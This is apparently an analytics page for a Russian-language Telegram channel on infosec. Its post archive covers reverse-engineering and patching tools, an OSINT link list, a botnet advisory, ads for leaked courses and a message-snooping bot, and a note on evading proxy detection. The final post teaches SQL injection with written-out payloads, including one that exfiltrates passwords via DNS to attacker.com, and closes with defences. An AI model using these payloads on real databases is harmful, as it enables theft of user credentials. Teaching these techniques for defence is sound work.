en
Feedback
CodeGuard: CyberSec Edition

CodeGuard: CyberSec Edition

Closed channel

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Show more

📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition

Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 13 327 subscribers, ranking 9 290 in the Technologies & Applications category and 48 812 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 13 327 subscribers.

According to the latest data from 03 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 158 over the last 30 days and by 6 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 11.76%. Within the first 24 hours after publication, content typically collects 5.74% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 1 566 views. Within the first day, a publication typically gains 765 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 6.
  • Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Thanks to the high frequency of updates (latest data received on 04 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

13 327
Subscribers
+624 hours
+447 days
+15830 days
Posts Archive
🔍 GoReSym: парсер символов Go от Mandiant для реверс-инжиниринга Инструмент для извлечения метаданных из Go-бинарников: функ
🔍 GoReSym: парсер символов Go от Mandiant для реверс-инжиниринга Инструмент для извлечения метаданных из Go-бинарников: функции, имена файлов, строки, структуры, типы и даже компилятор. Работает со стрипнутыми, упакованными (UPX) и повреждёнными бинарниками. Поддерживает все версии Go. Что извлекает:
Версию компилятора, архитектуру, ОС, порядок байт
Адреса функций, их имена, исходные файлы и номера строк
Имена типов (структуры, интерфейсы)
Встроенные строки (из таблицы интернирования)
Флаги сборки, buildid, информацию о модулях
Интеграция с дизассемблерами: ⚪️Сгенерированный JSON можно загрузить в: ⚪️IDA Pro — скрипт IDAPython/goresym_rename.py ⚪️Ghidra — скрипт GhidraPython/goresym_rename.py ⚪️Binary Ninja — плагин binja-GoReSym 🔗 GitHub 😈 CodeGuard: PySec Edition | Чат

⚠️ Внимание: Опубликована слитая недавно База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🤖 Нейросети – 855+ материалов 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов ⌛️ Ссылки будут активны 48 часов, сохрани себе, чтобы не потерять!

Компьютерные_сети_Карманный_хакер.pdf0.91 KB

Обещанный мануал из видео 👆

👍 Вот оно и случилось... мы выпустили ролик на ютуб Вместе с каналом «Карманный хакер» разобрали сетевую базу, без которой с
👍 Вот оно и случилось... мы выпустили ролик на ютуб Вместе с каналом «Карманный хакер» разобрали сетевую базу, без которой сложно двигаться в ИБ. 📱 Смотреть ролик https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms С любовью CodeGuard: PySec Edition | Карманный хакер

🛡 PatchMon: централизованное управление обновлениями в серверных средах Инструмент для админов и Blue Team, который позволяе
🛡 PatchMon: централизованное управление обновлениями в серверных средах Инструмент для админов и Blue Team, который позволяет безопасно и централизованно управлять обновлениями на разных серверах. Агенты обмениваются данными с сервером PatchMon только по исходящим каналам — не нужно открывать порты и рисковать. Что умеет:
Централизованное управление патчами на множестве серверов
Агенты работают через исходящие соединения (без открытых портов)
Полная видимость состояния обновлений
Безопасная автоматизация процессов
🔗 GitHub: PatchMon/PatchMon 😈 CodeGuard: PySec Edition | Чат

⚡️ Новое обновление Telegram! Теперь наш бизнес-бот работает БЕЗ Telegram Premium С ним ты сможешь: • Сохранять одноразовые ф
⚡️ Новое обновление Telegram! Теперь наш бизнес-бот работает БЕЗ Telegram Premium С ним ты сможешь:
• Сохранять одноразовые фотографии • Смотреть удаленные сообщения • Общаться с ИИ прямо в Telegram
— И это абсолютно бесплатно Ничего скачивать не нужно, просто запусти: @enterMOD_bot

➡️ 9 типов тестирования API 😈 CodeGuard: PySec Edition | Чат
➡️ 9 типов тестирования API 😈 CodeGuard: PySec Edition | Чат

🚨Ключевая информация об угрозе. Ботнет RondoDox активно использует критическую уязвимость React2Shell (CVE-2025-55182, CVSS:
🚨Ключевая информация об угрозе. Ботнет RondoDox активно использует критическую уязвимость React2Shell (CVE-2025-55182, CVSS: 10.0) для взлома серверов Next.js и IoT-устройств. Цель — установка майнеров криптовалют и создание ботнета для DDoS-атак. Важно: уязвимость касается React/Next.js, а не Microsoft Exchange, как было упомянуто ранее. 🛡 Что делать?
Срочно обновить Next.js до патченной версии.
Изолировать IoT-устройства в отдельные VLAN.
Установить WAF (брандмауэр веб-приложений).
Мониторить запуск подозрительных процессов.
Блокировать известные C2-серверы.
😈 CodeGuard: PySec Edition | Чат

#Шпаргалка 😈 CodeGuard: PySec Edition | Чат
#Шпаргалка 😈 CodeGuard: PySec Edition | Чат

👨‍💻Хочешь расти в IT, но некогда читать простыни текста? Lab IT — короткие разборы, полезные приёмы и понятные объяснения.
👨‍💻Хочешь расти в IT, но некогда читать простыни текста? Lab IT — короткие разборы, полезные приёмы и понятные объяснения. Всё для тех, кто работает в IT прямо сейчас. ➡️ https://t.me/+ZUhr3zFZWk9mY2My

🌍 OSINT International: гигантская коллекция ссылок по 50+ странам мира Сборник ресурсов для OSINT-исследований, где собраны
🌍 OSINT International: гигантская коллекция ссылок по 50+ странам мира Сборник ресурсов для OSINT-исследований, где собраны карты, реестры, базы данных и полезные ссылки по множеству стран. Всё в одном месте, разбито по странам. Что внутри:
Карты — топографические, спутниковые, исторические, кадастровые
Реестры — юридические лица, недвижимость, судебные дела, патенты
СМИ и соцсети — локальные новостные ресурсы, поиск по людям
Госструктуры — сайты министерств, ведомств, открытые данные
Статистика — демография, экономика, транспорт, инфраструктура
🔗 Ссылка: OSINT International 😈 CodeGuard: PySec Edition | Чат

📘 DevOps-инженер: от основ до продакшена — новый курс на Mentorix Пишете код, но деплой и прод — чёрный ящик? Курс про инжен
📘 DevOps-инженер: от основ до продакшена — новый курс на Mentorix Пишете код, но деплой и прод — чёрный ящик? Курс про инженерию эксплуатации: от первого сервера до автоматизированной CI/CD-инфраструктуры, которая держит нагрузку и не падает. ⚙️ Стек: Docker, Kubernetes, Ansible, Terraform, CI/CD, Prometheus + Grafana, логи ELK 🧩 Задания с автопроверкой + лабы в настоящем терминале 💻 Финальный проект в портфолио 🎓 Сертификат · доступ навсегда 🏷 −35% по промокоду DEVOPS35 — только 48 часов 13 990 ₽9 094 ₽Забрать курс со скидкой ━━━━━━━━━━━━━━ 🎁 А ещё на платформе — бесплатные курсы: Языки программированияGolang — основы языка 🦀 Rust — основы языка 🐍 Основы Python Инфраструктура и DevOps 🖥 Основы DevOps 🐳 Docker: первые шаги 🔧 Git для начинающих Базы данныхSQL с нуляMongoDB с нуля 📚 Все бесплатные курсы Mentorix

Надо видос? ❤️ — Да! 👍 — Нет 😈 CodeGuard: PySec Edition | Чат

Привет. Вот тебе самые топовые каналы по IT! ⚙️ Dev Boost — Самая огромная коллекция платных курсов, которые можно скачать бесплатно; 👩‍💻 IT Books — Самая огромная библиотека книг; 💻 Hacking & InfoSec Base — Крутой блог белого хакера; 🛡 CyberGuard — Всё про ИБ; 🤔 ИБ Вакансии — Всё, чтобы найти работу в ИБ; 👩‍💻 linux administration — Всё про Линукс; 📲 В Max тоже есть место для линуксоидов; 👩‍💻 Программистика — Python, python и ещё раз python; 👩‍💻 GameDev Base — Всё про GameDev; 😆 //code — Самые топовые мемы по IT: 📲 Мы в Max; Подпишись, чтобы не потерять!

🛡 Как ТСПУ ловит VLESS в 2026 и почему XHTTP — следующий шаг Статья разбирает методы детекции, которые работают прямо сейчас
🛡 Как ТСПУ ловит VLESS в 2026 и почему XHTTP — следующий шаг Статья разбирает методы детекции, которые работают прямо сейчас. Если ваш VLESS+Reality сервер лёг в последние месяцы — вы не один. В сообществах фиксируют волны блокировок, которые раньше не достигали хорошо настроенных Reality-серверов. Как ТСПУ видят VLESS:
JA3/JA4-отпечатки — TLS-рукопожатие имеет уникальные характеристики, которые можно детектировать
Поведенческий анализ — даже при шифровании, паттерны трафика (размер пакетов, тайминги) могут выдать прокси
Сертификаты — даже если они "поддельные", методы анализа становятся умнее
XHTTP — что это:
Новая транспортная обёртка, маскирующая прокси-трафик под обычный HTTP/3
Использует QUIC, который сложнее анализировать
Разработан для противодействия именно поведенческому анализу
➡️ Полная статья 😈 CodeGuard: PySec Edition | Чат

💡 SQL-инъекция: От UNION до кражи данных через DNS Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак. 🔍 1. UNION-based — когда результат виден Работает, если данные из запроса выводятся на страницу (список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат.
' UNION SELECT username, password FROM users-- 
Суть: Крадём данные напрямую из интерфейса. 🎭 2. Blind (Слепая) — когда результат не виден Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет":
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'-- 
Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли. ⏱️ 3. Time-based — слепая, но с таймером Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)-- 
Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали. 🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')-- 
Как работает:
СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.
Для этого она делает DNS-запрос к домену attacker.com.
В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.
Данные украдены.
💎 Итог:
UNION — если виден вывод.
Blind — если есть косвенная реакция.
DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.
Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.
😈 CodeGuard: PySec Edition | Чат